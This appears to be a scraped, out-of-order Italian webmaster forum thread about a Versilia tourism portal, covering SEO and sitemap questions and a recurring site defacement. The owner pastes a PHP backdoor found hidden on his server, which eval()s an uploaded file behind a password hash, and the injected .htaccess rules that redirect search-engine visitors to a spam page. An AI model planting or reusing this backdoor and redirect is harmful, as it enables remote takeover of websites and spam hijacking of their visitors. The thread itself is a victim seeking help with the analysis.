Grazie della risposta, il sito è infoversilia.com, se hai voglia di dargli un occhiata avere un parere mi farebbe molto piacere.
Il sito è attivo da poco e per ora su 1500 pagine google ne ha indicizzate meno di 400 credo dipenda anche da quello...Sembra che operi una 'visita' del sito in profondità per poi risalire verso la radice
Salve,
ho realizzato un portale turistico per la versilia e ho una domanda riguardo la composizione delle URL
La struttura che ho adottato al momento è la seguente.
Hotel in Versilia:
DOMINIO/hotel-versilia/
Hotel di Forte dei Marmi
DOMINIO/hotel-versilia/hotel-forte-dei-marmi.html
Scheda Hotel di Forte dei Marmi
DOMINIO/hotel-versilia/hotel-Forte-dei-Marmi/hotel%20Royal-Forte%20dei%20Marmi-464.html
La mia paura è di aver sovra ottimizzato le URL.
Il portale è online da meno di due mesi e mi sto accorgendo che google predilige l'indicizzazione e posizionamento delle schede delle varie strutture piuttosto che le pagine dove sono presenti gli elenchi come ad esempio la pagina degli hotel della Versilia o di Forte dei Marmi.
Non ho inserito il nome del dominio poiché credo vada contro le regole
Salve,
sto realizzando un portale turistico sulla Versilia. Il portale in questione è infoversilia COM . Vorrei avere qualche opinione sulla struttura delle URL che ho dato.
Una domanda riguardo le sitemap: ogni volta che aggiungo pagine al portale, creo un nuovo file xml e lo segnalo a google, o basta che sovrascriva quello esistente?
Dominio:
infoversilia.com
Motori:
Google
Prima indicizzazione o attività:
15 febbraio 2010
Cambiamenti effettuati:
espansione del portale
Eventi legati ai link:
nessuno
Sito realizzato con:
php
Come ho aumentato la popolarità:
scambi link per ora e aumento visite tramite facebook
Chiavi:
hotel versilia, versilia, hotel viareggio
Sitemaps:
Si
Salve,
ho la necessità di poter aprire dei file (tipicamente dei jpg da ridimensionare via script) presenti sotto un sito che risiede sullo stesso server sul quale risiede il sito sul quale deve girare lo script.
Ho provato con fopen via http, ma non va, ovviamente non va nemmeno con include o require, nemmeno col path completo.
Come posso fare?
Se lo fai a pagamento puoi acquistare ntr support. E' veramente buono.
mandami in pvt l'email...ma sei sicuro di volerlo fare? E' un discreto lavoro!
Ho già controllato e non ho trovato file con estensione .jpg.php
STo iniziando a diventare matto!
La cosa che mi fa veramente inc****re è che il deface è fatto per portare accessi a siti grandi come directline ecc.. quindi dietro questo c'è probabilmente una webagency che vuol portare accessi ai suoi clienti in tutti i modi.
Puoi provare a spiegarmi meglio quello che hai detto? Io ho provato ad usare questo script come destinatario di una post, ho inviato un file tramite un modulo, ma non sono arrivato molto oltre.
Potete aiutarmi a capire l'intento di questo script che ho trovato occultato nelle mie cartelle?
<?php
error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t) {
echo "$t\n";
};
function testdata($t) {
say(md5("testdata_$t"));
};
echo "<pre>";
testdata('start');
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"])){
eval($code);
}
else{
testdata('f');
};
}
else{
testdata('pass');
};
testdata('end');
echo "</pre>";
?>
```Credo di aver capito cosa fa, ma non riesco a capire il perché lo fa.
Mi rimane oscura la comprensione del funzionamento che c'è alle spalle.
A questo va associato il file .htaccess che viene modificato così:
RewriteEngine on
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http:([a-z0-9_-]+.)(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24).
RewriteCond %{HTTP_REFERER}?&=
RewriteCond %{HTTP_REFERER} =[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.$ /images/ekukure/ex3/t.htm
RewriteRule foto-(.*).html gallery.php?dir=$1
Quello che mi hai fatto vedere non è una include! In pratica non ne uso di include!
Stamani al solito ho ritrovato il deface in atto. Sono alla disperazione! Cosa posso fare? Secondo voi hanno il controllo dell'ftp? Cambio la pwd?
Lo so, ma ormai con tutte le modifiche che ho apportato è inaggiornabile...
Non saprei, anche perché l'ho modificata pesantemente, cmq dovrebbe essere la 2.0.21
Ti ho mandato un messaggio in pvt. Cmq le password sono molto diverse. Sul sito è installata una versione molto modificata di phpbb, sarebbe ostico effettuare un controllo di tutte le variabili...
Non è sql-injection poiché il db è integro. Hano creato molti file php e modificato htaccess. Cosa potrei controllare? Ho un modulo che consente l'upload di immagini, ho bloccato tutti i file non jpg..
Tipicamente quali vulnerabilità vengono sfruttate per questo tipo di crack?
Ho controllato tutto e non riesco a trovare la vulnerabilità che ogni giorno sfruttano!
la tecnologia è php, hanno modificato l'htaccess della root (e questo mi fa tremare le gambe) inserendo un htaccess fasullo a vista (che inrealtà dovrebbe essere nascosto) ed inserito due cartelle in una cartella interna
Salve,
dall'inizio della settimana avevo notato un tracollo negli accessi al mio sito.
Ho provato a fare un controllo e sono rimasto sconcertato.
Digito una qualsiasi chiave di ricerca per la quale sono ben posizionato.
Clicco sul link al mio sito e..
Invece di apparire la home page, mi appare una pagina nera (tipo blog) con link a siti spam.
E' mai successo a nessuno una cosa del genere? Cosa posso fare?
ho creato un account nuovo..